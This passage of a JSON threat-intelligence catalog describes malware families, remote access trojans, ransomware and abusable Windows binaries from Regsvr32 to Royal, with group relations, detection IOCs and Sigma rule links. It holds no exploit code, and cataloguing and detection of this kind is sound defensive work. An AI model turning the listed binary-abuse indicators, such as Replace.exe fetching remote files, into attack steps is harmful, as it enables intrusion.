IOC: regsvr32.exe executing scriptlet (sct) files\n* IOC: DotNet CLR libraries loaded into regsvr32.exe\n* IOC: DotNet CLR Usage Log - regsvr32.exe.log[[LOLBAS Regsvr32](/references/8e32abef-534e-475a-baad-946b6ec681c1)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5153", + "source": "Tidal Cyber", + "tags": [ + "32be7240-e5ea-4e8a-8e95-7c1bd7869754", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "37f317d8-02f0-43d4-8a7d-7a65ce8aadf1", + "type": "used-by" + }, + { + "dest-uuid": "c0fe9859-e8de-4ce1-bc3c-b489e914a145", + "type": "used-by" + }, + { + "dest-uuid": "eadd78e3-3b5d-430a-b994-4360b172c871", + "type": "used-by" + }, + { + "dest-uuid": "b82c6ed1-c74a-4128-8b4d-18d1e17e1134", + "type": "used-by" + }, + { + "dest-uuid": "8951bff3-c444-4374-8a9e-b2115d9125b2", + "type": "used-by" + }, + { + "dest-uuid": "43f826a1-e8c8-47b8-9b00-38e1b3e4293b", + "type": "used-by" + }, + { + "dest-uuid": "58db02e6-d908-47c2-bc82-ed58ada61331", + "type": "used-by" + }, + { + "dest-uuid": "d7c58e7f-f0b0-44c6-b205-5adcfb56f0e6", + "type": "used-by" + }, + { + "dest-uuid": "73da066d-b25f-45ba-862b-1a69228c6baa", + "type": "used-by" + }, + { + "dest-uuid": "713e2963-fbf4-406f-a8cf-6a4489d90439", + "type": "used-by" + }, + { + "dest-uuid": "400f3e02-f6b9-405a-8cd0-12dcf81cf4e4", + "type": "similar" + } + ], + "uuid": "533d2c42-45a7-456e-af75-b61e2aff98a7", + "value": "Regsvr32" + }, + { + "description": "[Remcos](https://app.tidalcyber.com/software/2eb92fa8-514e-4018-adc4-c9fe4f082567) is a closed-source tool that is marketed as a remote control and surveillance software by a company called Breaking Security. [Remcos](https://app.tidalcyber.com/software/2eb92fa8-514e-4018-adc4-c9fe4f082567) has been observed being used in malware campaigns.[[Riskiq Remcos Jan 2018](https://app.tidalcyber.com/references/a641a41c-dcd8-47e5-9b29-109dd2eb7f1e)][[Talos Remcos Aug 2018](https://app.tidalcyber.com/references/c5cb2eff-ed48-47ff-bfd6-79152bf51430)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0332", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "efb3b5ac-cd86-44a2-9de1-02e4612b8cc2", + "type": "used-by" + }, + { + "dest-uuid": "12279b62-289e-49ee-97cb-c780edd3d091", + "type": "used-by" + }, + { + "dest-uuid": "7cd0bc75-055b-4098-a00e-83dc8beaff14", + "type": "similar" + } + ], + "uuid": "2eb92fa8-514e-4018-adc4-c9fe4f082567", + "value": "Remcos" + }, + { + "description": "[Remexi](https://app.tidalcyber.com/software/82d0bb4d-4711-49e3-9fe5-c522bbe5e8bb) is a Windows-based Trojan that was developed in the C programming language.[[Securelist Remexi Jan 2019](https://app.tidalcyber.com/references/07dfd8e7-4e51-4c6e-a4f6-aaeb74ff8845)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0375", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "a57b52c7-9f64-4ffe-a7c3-0de738fb2af1", + "type": "used-by" + }, + { + "dest-uuid": "ecc2f65a-b452-4eaf-9689-7e181f17f7a5", + "type": "similar" + } + ], + "uuid": "82d0bb4d-4711-49e3-9fe5-c522bbe5e8bb", + "value": "Remexi" + }, + { + "description": "[[Remote.exe - LOLBAS Project](/references/9a298f83-80b8-45a3-9f63-6119be6621b4)]", + "meta": { + "id": "33bc2a4a-117d-492e-8b7e-893d28566989", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "3a1436e9-ce2c-449e-a670-c1b212ebd754", + "type": "similar" + } + ], + "uuid": "fcde468a-6c78-46b0-967a-240fcbe815f6", + "value": "Remote.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Debugging tool included with Windows Debugging Tools\n\n**Author:** mr.d0x\n\n**Paths:**\n* C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\remote.exe\n* C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\remote.exe\n\n**Resources:**\n* [https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/](https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/)\n\n**Detection:**\n* IOC: remote.exe process spawns\n* Sigma: [proc_creation_win_lolbin_remote.yml](https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/process_creation/proc_creation_win_lolbin_remote.yml)[[Remote.exe - LOLBAS Project](/references/9a298f83-80b8-45a3-9f63-6119be6621b4)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5234", + "source": "Tidal Cyber", + "tags": [ + "828f1559-b13d-4426-9dcf-5f601fcb6ff0", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "fcde468a-6c78-46b0-967a-240fcbe815f6", + "type": "similar" + } + ], + "uuid": "3a1436e9-ce2c-449e-a670-c1b212ebd754", + "value": "Remote" + }, + { + "description": "[RemoteCMD](https://app.tidalcyber.com/software/57fa64ea-975a-470a-a194-3428148ae9ee) is a custom tool used by [APT3](https://app.tidalcyber.com/groups/9da726e6-af02-49b8-8ebe-7ea4235513c9) to execute commands on a remote system similar to SysInternal's PSEXEC functionality. [[Symantec Buckeye](https://app.tidalcyber.com/references/dbf3ce3e-bcf2-4e47-ad42-839e51967395)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0166", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "9da726e6-af02-49b8-8ebe-7ea4235513c9", + "type": "used-by" + }, + { + "dest-uuid": "4e6b9625-bbda-4d96-a652-b3bb45453f26", + "type": "similar" + } + ], + "uuid": "57fa64ea-975a-470a-a194-3428148ae9ee", + "value": "RemoteCMD" + }, + { + "description": "[RemoteUtilities](https://app.tidalcyber.com/software/8a7fa0df-c688-46be-94bf-462fae33b788) is a legitimate remote administration tool that has been used by [MuddyWater](https://app.tidalcyber.com/groups/dcb260d8-9d53-404f-9ff5-dbee2c6effe6) since at least 2021 for execution on target machines.[[Trend Micro Muddy Water March 2021](https://app.tidalcyber.com/references/16b4b834-2f44-4bac-b810-f92080c41f09)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0592", + "source": "MITRE", + "tags": [], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "dcb260d8-9d53-404f-9ff5-dbee2c6effe6", + "type": "used-by" + }, + { + "dest-uuid": "03c6e0ea-96d3-4b23-9afb-05055663cf4b", + "type": "similar" + } + ], + "uuid": "8a7fa0df-c688-46be-94bf-462fae33b788", + "value": "RemoteUtilities" + }, + { + "description": "ProjectSauron is used to refer both to the threat group also known as G0041 as well as the malware platform also known as S0125. [[Kaspersky ProjectSauron Blog](https://app.tidalcyber.com/references/baeaa632-3fa5-4d2b-9537-ccc7674fd7d6)]", + "meta": { + "id": "d3b1274a-04a1-4a55-a318-63ffe1fdf114" + }, + "related": [ + { + "dest-uuid": "e3729cff-f25e-4c01-a7a1-e8b83e903b30", + "type": "similar" + } + ], + "uuid": "4535e2aa-6351-4200-9e81-ea1a883bc6d3", + "value": "ProjectSauron" + }, + { + "description": "", + "meta": { + "id": "15f882e8-7e1f-43a8-a680-4489b3b13fa9" + }, + "related": [ + { + "dest-uuid": "e3729cff-f25e-4c01-a7a1-e8b83e903b30", + "type": "similar" + } + ], + "uuid": "818bf505-64bb-43da-88ae-58c60c8590b3", + "value": "Backdoor.Remsec" + }, + { + "description": "[Remsec](https://app.tidalcyber.com/software/e3729cff-f25e-4c01-a7a1-e8b83e903b30) is a modular backdoor that has been used by [Strider](https://app.tidalcyber.com/groups/deb573c6-071a-4b50-9e92-4aa648d8bdc1) and appears to have been designed primarily for espionage purposes. Many of its modules are written in Lua. [[Symantec Strider Blog](https://app.tidalcyber.com/references/664eac41-257f-4d4d-aba5-5d2e8e2117a7)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0125", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "deb573c6-071a-4b50-9e92-4aa648d8bdc1", + "type": "used-by" + }, + { + "dest-uuid": "69d6f4a9-fcf0-4f51-bca7-597c51ad0bb8", + "type": "similar" + }, + { + "dest-uuid": "4535e2aa-6351-4200-9e81-ea1a883bc6d3", + "type": "similar" + }, + { + "dest-uuid": "818bf505-64bb-43da-88ae-58c60c8590b3", + "type": "similar" + } + ], + "uuid": "e3729cff-f25e-4c01-a7a1-e8b83e903b30", + "value": "Remsec" + }, + { + "description": "[[Replace.exe - LOLBAS Project](/references/82a473e9-208c-4c47-bf38-92aee43238dd)]", + "meta": { + "id": "3cabd4a8-a41a-428c-a018-ab68ab9bab9e", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "19a04c82-f816-464c-b050-a57269cba157", + "type": "similar" + } + ], + "uuid": "9e22fb92-6276-4af9-8394-9d6f8a62df9b", + "value": "Replace.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Used to replace file with another file\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\replace.exe\n* C:\\Windows\\SysWOW64\\replace.exe\n\n**Resources:**\n* [https://twitter.com/elceef/status/986334113941655553](https://twitter.com/elceef/status/986334113941655553)\n* [https://twitter.com/elceef/status/986842299861782529](https://twitter.com/elceef/status/986842299861782529)\n\n**Detection:**\n* IOC: Replace.exe retrieving files from remote server\n* Sigma: [proc_creation_win_lolbin_replace.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_replace.yml)[[Replace.exe - LOLBAS Project](/references/82a473e9-208c-4c47-bf38-92aee43238dd)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5154", + "source": "Tidal Cyber", + "tags": [ + "accb4d24-4b40-41ce-ae2e-adcca7e80b41", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "9e22fb92-6276-4af9-8394-9d6f8a62df9b", + "type": "similar" + } + ], + "uuid": "19a04c82-f816-464c-b050-a57269cba157", + "value": "Replace" + }, + { + "description": "Responder is an open source tool used for LLMNR, NBT-NS and MDNS poisoning, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. [[GitHub Responder](https://app.tidalcyber.com/references/3ef681a9-4ab0-420b-9d1a-b8152c50b3ca)]", + "meta": { + "platforms": [], + "software_attack_id": "S0174", + "source": "MITRE", + "tags": [ + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "6070668f-1cbd-4878-8066-c636d1d8659c", + "d8f7e071-fbfd-46f8-b431-e241bb1513ac", + "61cdbb28-cbfd-498b-9ab1-1f14337f9524", + "e551ae97-d1b4-484e-9267-89f33829ec2c", + "dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "5b1a5b9e-4722-41fc-a15d-196a549e3ac5", + "type": "used-by" + }, + { + "dest-uuid": "0bc66e95-de93-4de7-b415-4041b7191f08", + "type": "used-by" + }, + { + "dest-uuid": "a1dd2dbd-1550-44bf-abcc-1a4c52e97719", + "type": "similar" + } + ], + "uuid": "2a5ea3a7-9873-4a2e-b4b5-4e27a80db305", + "value": "Responder" + }, + { + "description": "[Revenge RAT](https://app.tidalcyber.com/software/f99712b4-37a2-437c-92d7-fb4f94a1f892) is a freely available remote access tool written in .NET (C#).[[Cylance Shaheen Nov 2018](https://app.tidalcyber.com/references/57802e46-e12c-4230-8d1c-08854a0de06a)][[Cofense RevengeRAT Feb 2019](https://app.tidalcyber.com/references/3abfc3eb-7f9d-49e5-8048-4118cde3122e)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0379", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "830079fe-9824-405b-93e0-c28592155c49", + "type": "used-by" + }, + { + "dest-uuid": "1bfbb1e1-022c-57e9-b70e-711c601640be", + "type": "used-by" + }, + { + "dest-uuid": "bdb27a1d-1844-42f1-a0c0-826027ae0326", + "type": "similar" + } + ], + "uuid": "f99712b4-37a2-437c-92d7-fb4f94a1f892", + "value": "Revenge RAT" + }, + { + "description": "[[Secureworks REvil September 2019](https://app.tidalcyber.com/references/8f4e2baf-4227-4bbd-bfdb-5598717dcf88)][[Intel 471 REvil March 2020](https://app.tidalcyber.com/references/b939dc98-e00e-4d47-84a4-3eaaeb5c0abf)][[G Data Sodinokibi June 2019](https://app.tidalcyber.com/references/03b1ef5a-aa63-453a-affc-aa0caf174ce4)][[Kaspersky Sodin July 2019](https://app.tidalcyber.com/references/ea46271d-3251-4bd7-afa8-f1bd7baf9570)][[Cylance Sodinokibi July 2019](https://app.tidalcyber.com/references/3ad8def7-3a8a-49bb-8f47-dea2e570c99e)][[Secureworks GandCrab and REvil September 2019](https://app.tidalcyber.com/references/46b5d57b-17be-48ff-b723-406f6a55d84a)][[Talos Sodinokibi April 2019](https://app.tidalcyber.com/references/fb948877-da2b-4abd-9d57-de9866b7a7c2)][[McAfee Sodinokibi October 2019](https://app.tidalcyber.com/references/1bf961f2-dfa9-4ca3-9bf5-90c21755d783)][[McAfee REvil October 2019](https://app.tidalcyber.com/references/288e94b3-a023-4b59-8b2a-25c469fb56a1)][[Picus Sodinokibi January 2020](https://app.tidalcyber.com/references/2e9c2206-a04e-4278-9492-830cc9347ff9)][[Secureworks REvil September 2019](https://app.tidalcyber.com/references/8f4e2baf-4227-4bbd-bfdb-5598717dcf88)][[Tetra Defense Sodinokibi March 2020](https://app.tidalcyber.com/references/a6ef0302-7bf4-4c5c-a6fc-4bd1c3d67d50)]", + "meta": { + "id": "043041bc-aade-4c05-921f-c773f2d9886c" + }, + "related": [ + { + "dest-uuid": "9314531e-bf46-4cba-9c19-198279ccf9cd", + "type": "similar" + } + ], + "uuid": "6fcd580a-ca00-4d56-95e5-d33d34d9da3a", + "value": "Sodinokibi" + }, + { + "description": "[[Intel 471 REvil March 2020](https://app.tidalcyber.com/references/b939dc98-e00e-4d47-84a4-3eaaeb5c0abf)][[Kaspersky Sodin July 2019](https://app.tidalcyber.com/references/ea46271d-3251-4bd7-afa8-f1bd7baf9570)]", + "meta": { + "id": "6086442f-6f60-4f6f-8659-d8c967ff7b56" + }, + "related": [ + { + "dest-uuid": "9314531e-bf46-4cba-9c19-198279ccf9cd", + "type": "similar" + } + ], + "uuid": "37fc63a5-5059-4fd9-b598-ae195d9f7d1f", + "value": "Sodin" + }, + { + "description": "[REvil](https://app.tidalcyber.com/software/9314531e-bf46-4cba-9c19-198279ccf9cd) is a ransomware family that has been linked to the [GOLD SOUTHFIELD](https://app.tidalcyber.com/groups/b4d068ac-9b68-4cd8-bf0c-019f910ef8e3) group and operated as ransomware-as-a-service (RaaS) since at least April 2019. [REvil](https://app.tidalcyber.com/software/9314531e-bf46-4cba-9c19-198279ccf9cd), which as been used against organizations in the manufacturing, transportation, and electric sectors, is highly configurable and shares code similarities with the GandCrab RaaS.[[Secureworks REvil September 2019](https://app.tidalcyber.com/references/8f4e2baf-4227-4bbd-bfdb-5598717dcf88)][[Intel 471 REvil March 2020](https://app.tidalcyber.com/references/b939dc98-e00e-4d47-84a4-3eaaeb5c0abf)][[Group IB Ransomware May 2020](https://app.tidalcyber.com/references/18d20965-f1f4-439f-a4a3-34437ad1fe14)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0496", + "source": "MITRE", + "tags": [ + "286918d5-0b48-4655-9118-907b53de0ee0", + "93c53801-5427-4678-a753-7fc761e9eda1", + "1138181b-b2cf-4b6b-82da-10867aa4089d", + "00ec2407-cc63-4b62-b967-c3e06bdddd2f", + "1cc90752-70a3-4a17-b370-e1473a212f79", + "0e948c57-6c10-4576-ad27-9832cc2af3a1", + "0ed7d10c-c65b-4174-9edb-446bf301d250", + "1b98f09a-7d93-4abb-8f3e-1eacdb9f9871", + "ab64f2d8-8da3-48de-ac66-0fd91d634b22", + "c8ce7130-e134-492c-a98a-ed1d25b57e4c", + "5e7433ad-a894-4489-93bc-41e90da90019", + "7e7b0c67-bb85-4996-a289-da0e792d7172" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "4348c510-50fc-4448-ab8d-c8cededd19ff", + "type": "used-by" + }, + { + "dest-uuid": "b4d068ac-9b68-4cd8-bf0c-019f910ef8e3", + "type": "used-by" + }, + { + "dest-uuid": "28f3dbcc-b248-442f-9ff3-234210bb2f2a", + "type": "used-by" + }, + { + "dest-uuid": "ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5", + "type": "similar" + }, + { + "dest-uuid": "6fcd580a-ca00-4d56-95e5-d33d34d9da3a", + "type": "similar" + }, + { + "dest-uuid": "37fc63a5-5059-4fd9-b598-ae195d9f7d1f", + "type": "similar" + } + ], + "uuid": "9314531e-bf46-4cba-9c19-198279ccf9cd", + "value": "REvil" + }, + { + "description": "[RGDoor](https://app.tidalcyber.com/software/d5649d69-52d4-4198-9683-b250348dea32) is a malicious Internet Information Services (IIS) backdoor developed in the C++ language. [RGDoor](https://app.tidalcyber.com/software/d5649d69-52d4-4198-9683-b250348dea32) has been seen deployed on webservers belonging to the Middle East government organizations. [RGDoor](https://app.tidalcyber.com/software/d5649d69-52d4-4198-9683-b250348dea32) provides backdoor access to compromised IIS servers. [[Unit 42 RGDoor Jan 2018](https://app.tidalcyber.com/references/94b37da6-f808-451e-8f2d-5df0e93358ca)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0258", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "d01abdb1-0378-4654-aa38-1a4a292703e2", + "type": "used-by" + }, + { + "dest-uuid": "b9eec47e-98f4-4b3c-b574-3fa8a87ebe05", + "type": "similar" + } + ], + "uuid": "d5649d69-52d4-4198-9683-b250348dea32", + "value": "RGDoor" + }, + { + "description": "[Rifdoor](https://app.tidalcyber.com/software/ca5ae7c8-467a-4434-82fc-db50ce3fc671) is a remote access trojan (RAT) that shares numerous code similarities with [HotCroissant](https://app.tidalcyber.com/software/a00e7fcc-b4e8-4f64-83d2-f9db64f0f3fe).[[Carbon Black HotCroissant April 2020](https://app.tidalcyber.com/references/43bcb35b-56e1-47a8-9c74-f7543a25b2a6)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0433", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "2cc997b5-5076-4eef-9974-f54387614f46", + "type": "used-by" + }, + { + "dest-uuid": "44c75271-0e4d-496f-ae0a-a6d883a42a65", + "type": "similar" + } + ], + "uuid": "ca5ae7c8-467a-4434-82fc-db50ce3fc671", + "value": "Rifdoor" + }, + { + "description": "[RIPTIDE](https://app.tidalcyber.com/software/00fa4cc2-6f99-4b18-b927-689964ef57e1) is a proxy-aware backdoor used by [APT12](https://app.tidalcyber.com/groups/225314a7-8f40-48d4-9cff-3ec39b177762). [[Moran 2014](https://app.tidalcyber.com/references/15ef155b-7628-4b18-bc53-1d30be4eac5d)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0003", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "225314a7-8f40-48d4-9cff-3ec39b177762", + "type": "used-by" + }, + { + "dest-uuid": "ad4f146f-e3ec-444a-ba71-24bffd7f0f8e", + "type": "similar" + } + ], + "uuid": "00fa4cc2-6f99-4b18-b927-689964ef57e1", + "value": "RIPTIDE" + }, + { + "description": "[Rising Sun](https://app.tidalcyber.com/software/19b1f1c8-5ef3-4328-b605-38e0bafc084d) is a modular backdoor that was used extensively in [Operation Sharpshooter](https://app.tidalcyber.com/campaigns/57e858c8-fd0b-4382-a178-0165d03aa8a9) between 2017 and 2019. [Rising Sun](https://app.tidalcyber.com/software/19b1f1c8-5ef3-4328-b605-38e0bafc084d) infected at least 87 organizations around the world, including nuclear, defense, energy, and financial service companies. Security researchers assessed [Rising Sun](https://app.tidalcyber.com/software/19b1f1c8-5ef3-4328-b605-38e0bafc084d) included some source code from [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08)'s Trojan Duuzer.[[McAfee Sharpshooter December 2018](https://app.tidalcyber.com/references/96b6d012-8620-4ef5-bf9a-5f88e465a495)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0448", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "56e6b6c2-e573-4969-8bab-783205cebbbf", + "type": "similar" + } + ], + "uuid": "19b1f1c8-5ef3-4328-b605-38e0bafc084d", + "value": "Rising Sun" + }, + { + "description": "[ROADTools](https://app.tidalcyber.com/software/15bc8e94-64d1-4f1f-bc99-08cfbac417dc) is a framework for enumerating Azure Active Directory environments. The tool is written in Python and publicly available on GitHub.[[ROADtools Github](https://app.tidalcyber.com/references/90c592dc-2c9d-401a-96ab-b539f7522956)]", + "meta": { + "platforms": [], + "software_attack_id": "S0684", + "source": "MITRE", + "tags": [ + "c9c73000-30a5-4a16-8c8b-79169f9c24aa" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "used-by" + }, + { + "dest-uuid": "6dbdc657-d8e0-4f2f-909b-7251b3e72c6d", + "type": "similar" + } + ], + "uuid": "15bc8e94-64d1-4f1f-bc99-08cfbac417dc", + "value": "ROADTools" + }, + { + "description": "[RobbinHood](https://app.tidalcyber.com/software/b65956ef-439a-463d-b85e-6606467f508a) is ransomware that was first observed being used in an attack against the Baltimore city government's computer network.[[CarbonBlack RobbinHood May 2019](https://app.tidalcyber.com/references/cb9e49fa-253a-447a-9c88-c6e507bae0bb)][[BaltimoreSun RobbinHood May 2019](https://app.tidalcyber.com/references/f578de81-ea6b-49d0-9a0a-111e07249cd8)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0400", + "source": "MITRE", + "tags": [ + "ce9f1048-09c1-49b0-a109-dd604afbf3cd", + "5e7433ad-a894-4489-93bc-41e90da90019", + "7e7b0c67-bb85-4996-a289-da0e792d7172" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "0a607c53-df52-45da-a75d-0e53df4dad5f", + "type": "similar" + } + ], + "uuid": "b65956ef-439a-463d-b85e-6606467f508a", + "value": "RobbinHood" + }, + { + "description": "[ROCKBOOT](https://app.tidalcyber.com/software/cb7aa34e-312f-4210-be7b-47a1e3f5b7b5) is a [Bootkit](https://app.tidalcyber.com/technique/032985de-5e09-4889-b8c4-84d940c6346c) that has been used by an unidentified, suspected China-based group. [[FireEye Bootkits](https://app.tidalcyber.com/references/585827a8-1f03-439d-b66e-ad5290117c1b)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0112", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "502223ee-8947-42f8-a532-a3b3da12b7d9", + "type": "used-by" + }, + { + "dest-uuid": "cba78a1c-186f-4112-9e6a-be1839f030f7", + "type": "similar" + } + ], + "uuid": "cb7aa34e-312f-4210-be7b-47a1e3f5b7b5", + "value": "ROCKBOOT" + }, + { + "description": "[RogueRobin](https://app.tidalcyber.com/software/852cf78d-9cdc-4971-a972-405921027436) is a payload used by [DarkHydrus](https://app.tidalcyber.com/groups/f2b31240-0b4a-4fa4-82a4-6bb00e146e75) that has been developed in PowerShell and C#. [[Unit 42 DarkHydrus July 2018](https://app.tidalcyber.com/references/800279cf-e6f8-4721-818f-46e35ec7892a)][[Unit42 DarkHydrus Jan 2019](https://app.tidalcyber.com/references/eb235504-d142-4c6d-9ffd-3c0b0dd23e80)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0270", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "f2b31240-0b4a-4fa4-82a4-6bb00e146e75", + "type": "used-by" + }, + { + "dest-uuid": "8ec6e3b4-b06d-4805-b6aa-af916acc2122", + "type": "similar" + } + ], + "uuid": "852cf78d-9cdc-4971-a972-405921027436", + "value": "RogueRobin" + }, + { + "description": "[ROKRAT](https://app.tidalcyber.com/software/a3479628-af0b-4088-8d2a-fafa384731dd) is a cloud-based remote access tool (RAT) used by [APT37](https://app.tidalcyber.com/groups/013fdfdc-aa32-4779-8f6e-7920615cbf66) to target victims in South Korea. [APT37](https://app.tidalcyber.com/groups/013fdfdc-aa32-4779-8f6e-7920615cbf66) has used ROKRAT during several campaigns from 2016 through 2021.[[Talos ROKRAT](https://app.tidalcyber.com/references/1bd78a2f-2bc6-426f-ac9f-16bf3fdf4cdf)][[Talos Group123](https://app.tidalcyber.com/references/bf8b2bf0-cca3-437b-a640-715f9cc945f7)][[Volexity InkySquid RokRAT August 2021](https://app.tidalcyber.com/references/bff1667b-3f87-4653-bd17-b675e997baf1)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0240", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "013fdfdc-aa32-4779-8f6e-7920615cbf66", + "type": "used-by" + }, + { + "dest-uuid": "60a9c2f0-b7a5-4e8e-959c-e1a3ff314a5f", + "type": "similar" + } + ], + "uuid": "a3479628-af0b-4088-8d2a-fafa384731dd", + "value": "ROKRAT" + }, + { + "description": "[RotaJakiro](https://app.tidalcyber.com/software/169bfcf6-544c-5824-a7cd-2d5070304b57) is a 64-bit Linux backdoor used by [APT32](https://app.tidalcyber.com/groups/c0fe9859-e8de-4ce1-bc3c-b489e914a145). First seen in 2018, it uses a plugin architecture to extend capabilities. [RotaJakiro](https://app.tidalcyber.com/software/169bfcf6-544c-5824-a7cd-2d5070304b57) can determine it's permission level and execute according to access type (`root` or `user`).[[RotaJakiro 2021 netlab360 analysis](https://app.tidalcyber.com/references/7a9c53dd-2c0e-5452-9ee2-01531fbf8ba8)][[netlab360 rotajakiro vs oceanlotus](https://app.tidalcyber.com/references/20967c9b-5bb6-5cdd-9466-2c9efd9ab98c)]", + "meta": { + "platforms": [ + "Linux" + ], + "software_attack_id": "S1078", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "c0fe9859-e8de-4ce1-bc3c-b489e914a145", + "type": "used-by" + }, + { + "dest-uuid": "08e844a8-371f-4fe3-9d1f-e056e64a7fde", + "type": "similar" + } + ], + "uuid": "169bfcf6-544c-5824-a7cd-2d5070304b57", + "value": "RotaJakiro" + }, + { + "description": "[route](https://app.tidalcyber.com/software/3b755518-9085-474e-8bc4-4f9344d9c8af) can be used to find or change information within the local system IP routing table. [[TechNet Route](https://app.tidalcyber.com/references/0e483ec8-af40-4139-9711-53b999e069ee)]", + "meta": { + "platforms": [], + "software_attack_id": "S0103", + "source": "MITRE", + "tags": [], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "863b7013-133d-4a82-93d2-51b53a8fd30e", + "type": "used-by" + }, + { + "dest-uuid": "0bc66e95-de93-4de7-b415-4041b7191f08", + "type": "used-by" + }, + { + "dest-uuid": "c11ac61d-50f4-444f-85d8-6f006067f0de", + "type": "similar" + } + ], + "uuid": "3b755518-9085-474e-8bc4-4f9344d9c8af", + "value": "route" + }, + { + "description": "[Rover](https://app.tidalcyber.com/software/ef38ff3e-fa36-46f2-a720-3abaca167b04) is malware suspected of being used for espionage purposes. It was used in 2015 in a targeted email sent to an Indian Ambassador to Afghanistan. [[Palo Alto Rover](https://app.tidalcyber.com/references/bbdf3f49-9875-4d41-986d-b693e82c77e1)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0090", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "6b616fc1-1505-48e3-8b2c-0d19337bff38", + "type": "similar" + } + ], + "uuid": "ef38ff3e-fa36-46f2-a720-3abaca167b04", + "value": "Rover" + }, + { + "description": "[Royal](https://app.tidalcyber.com/software/221e24cb-910f-5988-9473-578ef350870c) is ransomware that first appeared in early 2022; a version that also targets ESXi servers was later observed in February 2023. 